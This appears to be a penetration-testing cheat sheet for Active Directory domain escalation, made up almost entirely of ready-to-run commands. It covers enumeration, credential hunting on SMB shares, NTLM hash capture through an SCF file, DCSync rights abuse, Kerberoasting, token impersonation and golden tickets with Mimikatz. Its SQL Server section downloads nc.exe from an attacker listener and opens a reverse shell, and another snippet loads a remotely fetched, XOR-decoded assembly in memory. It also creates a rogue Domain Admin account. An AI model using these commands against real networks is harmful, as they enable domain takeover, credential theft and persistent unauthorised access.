Skip to content

Domain escalation

Domain enum

GUI enumeration

After installing RSAT, you can go to "Users and Computers AD => View => Advanced"

Full enumeration

# Install full bloodhound
sudo apt-get update && sudo apt-get install -y bloodhound python3-pip && pip3 install bloodhound
# bloodhound-python
bloodhound-python -d <domain> <user> -p <pass> -dc <fqdn_dc> -c All
# Custom queries
https://github.com/hausec/Bloodhound-Custom-Queries

# ldapdomaindump install
pip install ldapdomaindump
# ldapdomaindump usage
ldapdomaindump -u '<domain>\<user>' -p '<pass>' <target>

# widapsearch install 
git clone https://github.com/ropnop/windapsearch.git && pip install python-ldap && cd windapsearch
# windapsearch usage
./windapsearch.py -d <domain> -u <user> -p '<pass>' --da -o <output_dir> <target>
./windapsearch.py -d <domain> -u <user> -p '<pass>' --full -o <output_dir> <target>

#ldapsearch
sudo ldapsearch -x -LLL -H ldap://webmail.<domain>.fr -D "cn=<cn>" -b "dc=<domain>,dc=<fqdn>" -w '<pass>'

enum4linux -a <target>

Find domain name

cat /etc/resolv.

Get-NetDomain
Get-DomainSID

nmap -sT -vvv --open -T2 -sC --script=*-ntlm-info -sV  -p 110,995,143,993,3389,23,25,465,587,119,433,563,1433,80,8080,443,8443 <targets>

Users enumeration

Domain users and password policy (especially complexity and lockout threshold for bruteforce)

net user /domain

enum4linux <target> |grep "user:" | cut -d '[' -f2 | cut -d "]" -f1 > users.txt

$Searcher = New-Object DirectoryServices.DirectorySearcher
$Searcher.Filter = "(&(objectclass=computer))"
$Searcher.SearchRoot = ''
$Searcher.FindAll()

Get-NetUser | select samaccountname

Users with SPN

$Searcher = New-Object DirectoryServices.DirectorySearcher
$Searcher.Filter = "(&(!(samaccountname=krbtgt))(objectclass=user)(objectcategory=user)(servicePrincipalName=*))"
$Searcher.SearchRoot = ''
$Searcher.FindAll()

Get-NetUser -SPN | select samaccountname,serviceprincipalname

Policy enumeration

Domain users and password policy (especially complexity and lockout threshold for bruteforce)

net accounts /domain

enum4linux -P -o <target>

(Get-DomainPolicy);"kerberos policy"

Computers enumeration

Find DC IP

cat /etc/resolv.conf

nslookup <domain>

$Searcher = New-Object DirectoryServices.DirectorySearcher ; $Searcher.Filter = "(&(objectclass=user))" ; $Searcher.SearchRoot = '' ; $Searcher.FindAll()

Get-NetDomainController

Domain computers

netdom query SERVER

Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,ipv4Address | Export-CSV ADcomputerslist.csv -NoTypeInformation -Encoding UTF8

#pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump
adidnsdump -u <domain>\\<user> -p <pass>
adidnsdump -u <domain>\\<user> -p <pass> --forest --include-tombstoned
adidnsdump -u <domain>\\<user> -p <pass> --dns-tcp

# Find specific computer of domain user
SharpSniper.exe emusk <username> <password>

# Find computer where current user is local admin
Find-WMILocalAdminAccess

# Find computer where current can get a shell
Get-NetComputer -Unconstrained

# One-line powershell reverse lookup
for ($i=1; $i -le 254; $i++) { $a=Get-Random -Maximum 4; echo "10.11.12.$i"  $ErrorActionPreference = "SilentlyContinue"; [System.Net.DNS]::GetHostbyAddress("10.11.12.$i").HostName; $ErrorActionPreference = "Continue"; sleep $a }

Shares enumeration

Look for anonymous SMB, NFS, FTP, etc

SMB readable shares

# ManSpider
git clone https://github.com/blacklanternsecurity/MANSPIDER && cd MANSPIDER && pipenv --python 3 shell
pip install -r requirements.txt
./manspider.py <target> -d <domain> -u <user> -p <pass> -f passw user admin account network login logon cred 
./manspider.py <target> -d <domain> -u <user> -p <pass> -c password -e xlsx
./manspider.py <target> -d <domain> -u <user> -p <pass> -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config 

# smbmap
smbmap -H IP -r DOSSIER
smbmap -H IP --download DOSSIER
smbmap -P 445 -H <target> -u '<user>' -p '<pass>' 
smbmap --host-file smb-hosts.txt -u '<user>' -p '<pass>' -q -R --depth 3 --exclude ADMIN$ IPC$ -A '(web|server|global|index|login|logout|auth|httpd|config).(xml|config|conf|asax|aspx|php|asp|jsp|html)'

# smbget & smbclient
smbget -rR smb://<target>/<share>/ -U <user>
smbclient \\\\<target>\\c$ -U <user>
smbclient -L //<target> -U '<domain>\<user>'

# SMB V1
smbclient -L ///192.168.0.1 -U <user> -c ls [--option='client min protocol=NT1']
mount //10.11.1.136/"Bob Share" /mnt/bob [-o vers=1.0]

# wireshark filter to find SMB version
smb.native_lanman

SMB writable shares

upload this @scf_filename.scf and listen for hashs using Responder/NTLMrelayx

add a @ at first letter of the filename will place the .scf file on the top of the shared folder

[Shell]
Command=2
IconFile=\\<listener_ip>\share\<ico_name>.ico
[Taskbar]
Command=ToggleDesktop

NFS

showmount -e <target>
mount <target>:/home/xx /mnt/yy 

Forest enumeration

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

Get-NetForest
Get-NetForestCatalog
Get-NetForestTrust

ACLs

ACLPwn

# pip install aclpwn
python aclpwn.py -f <username> -ft user -d <domain> -dry
python aclpwn.py -f <computer_name> -ft computer -d <domain> -dry
python aclpwn.py -f <username> -ft user -d <domain>
python aclpwn.py -f <username> -ft user -d <domain>--restore aclpwn-20181129-182321.restore

# Powershell
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -NoDCSync
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -userAccountToPwn 'Administrator'
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -LogToFile
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -NoSecCleanup
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username <username> -Domain <domain> -Password <password>

Manual Exploit DCSync

# Get ACL
Get-DomainObjectAcl -Identity <username> -ResolveGUIDs ? { $_.SecurityIdentifier -Match $(ConvertTo-SID <domain>) }

# Add DCSync
Add-DomainObjectAcl -TargetIdentity "DC=<domain>,DC=<local>" -PrincipalIdentity <username> -Rights DCSync

# Dump ntds 
meterpreter > dcsync_ntlm <DOMAIN>\<user>

Kerberos Tokens

Tools

Reflectively load DOTNET CSHARP Assembly within Powershell (or Cobalt, SilentTrinity etc.) if you cant do it through your C2 Infra :

$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)

Kerberos Dump

# List SPN
impacket GetUserSPNs.ps1

# Create new service ticket into memory
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SSQLSvc/xor-app23.xor.com:1433"

# Mimikatz
.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit
Invoke-Mimikatz -Command '"kereberos::list /export"'

# Rubeus
Rubeus.exe klist
Rubeus.exe dump
Rubeus.exe monitor /interval:5 /nowrap ; MS-RPRN.exe \\<DC.fqdn> \\<target.fqdn> ; Rubeus.exe ptt /ticket:<TGT_of_DC$> ; Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"' ; enter-pssessions -computername <DC.fqdn>

Kerberos pre-auth

Rubeus.exe asreproast /outfile:asrep_hashes.txt

nmap -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/users.txt <target>

./kerbrute_linux_amd64 userenum -d <domain> usernames.txt -debug

impacket-GetNPUsers -usersfile kerb_users.txt <domain>/<user> -dc-ip <dc_ip>

Kerberoast attack

Rubeus.exe kerberoast /outfile:roasted_hashes.txt

Kerberos impersonate

Find domain admin accounts

net group "Domain Admins" /DOMAIN

Get-NetGroupMember -GroupName "Domain Admins" -Recurse

Find if one is loggedon somewhere :

crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> --loggedon-users
bloodhound-python -d <domain> <user> -p <pass> -dc <fqdn_dc> -c LoggedOn

Impersonate kerberos token

# Rubeus
Rubeus.exe s4u </ticket:BASE64 | /ticket:FILE.KIRBI> </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI>

# TokenManipulation
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

# Incognito loaded by Meterpreter
load incognito 
list_tokens -u
impersonate_token <domain>\\<user> # Double slash is mandatory !

# Incognito standalone executable
Incognito.exe

# CrackMapExec using kerberos ticket
export KRB5CCNAME=<user>.ccache 
sudo cme smb <target> --kerberos -x whoami

Check if a computer has the TrustedForDelegation flag enabled

Get-ADComputer -Identity <computer_name> -Properties TrustedForDelegation

Create new Domain Admin account

net user add <user> <pass> /domain
net group "Domain Admins" <user> /add

Golden Ticket

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<pwned_domain.fqdn> /sid:<pwned_domain_sid> /sids:<enterprise_admin_sid> /krbtgt:<krbtgt_hash> /ticket:krbtgt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt krbtgt.kirbi"'
ls \\<target_DC.fqdn>\C$

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"lsadump::dcsyn /domain:<domain.fqdn> /all"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<pwned_domain.fqdn> /sid:S-1-5-21-77175520-687805270-358672322 /sids:S-1-5-21-1458491649-1432147247-1990877046-519 /krbtgt:1ee3a9c4a96c4450878eaa8cb45b29fb /ptt"'
gwmi -class win32_operatingsystem -ComputerName <target_DC.fqdn>

Manual testing

Delegation Explained

SQL exploit

Trusted Links (pwn even across forests trusts)

.\PowerUpSQL.ps1
Get-SQLInstanceLocal
Get-SQLInstanceDomain
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded

Get-SQLServerLink  -Verbose -Instance <fqdn_db_target>
Get-SQLServerLinkCrawl  -Verbose -Instance <fqdn_db_target>
Get-SQLServerLinkCrawl  -Verbose -Instance <fqdn_db_target> -Query 'exec master..xp_cmdshell "whoami"'
Get-SQLServerLinkCrawl  -verbose -Instance <fqdn_db1> -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<fqdn_db2>"'
Get-SQLServerLinkCrawl -Instance <fqdn_db_target> -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadFile(''http://<listener_ip>/nc.exe'',''C:\Windows\Temp\nc.exe'')"' ; Get-SQLServerLinkCrawl -Instance <fqdn_db_target> -Query 'exec master..xp_cmdshell "C:\Windows\Temp\nc.exe -e cmd <listener_ip> 1234"'

Invoke-SQLEscalatePriv -Verbose -Instance "SQLServer1\Instance1"

Invoke-SQLAudit -Verbose -Instance <db_target>

SELECT IS_SRVROLEMEMBER ('sysadmin') , IS_MEMBER ('db_owner'), USER_NAME()
exec master.dbo.xp_dirtree '\\<attacker_IP>\<sharename>\xpdirtree_exploit'
SELECT IS_SRVROLEMEMBER ('sysadmin') , IS_MEMBER ('db_owner'), USER_NAME()

EXECUTE AS USER='dbo'
ALTER SERVER ROLE [sysadmin]
ADD MEMBER [<domain\sql_svc_user>]
EXEC sp_configure 'show advanced options',1

EXEC sp_configure 'xp_cmdshell',1
EXEC master..xp_cmdshell 'whoami'

#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN <user> WITH PASSWORD = ''''<pass>'''' '') AT "<domain>\<server1>"') AT "<domain>\<server2>"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''<user>'''' , ''''sysadmin'''' '') AT "<domain>\<server1>"') AT "<domain>\<server2>"

# Remediation
REVOKE Execute ON xp_dirtree FROM PUBLIC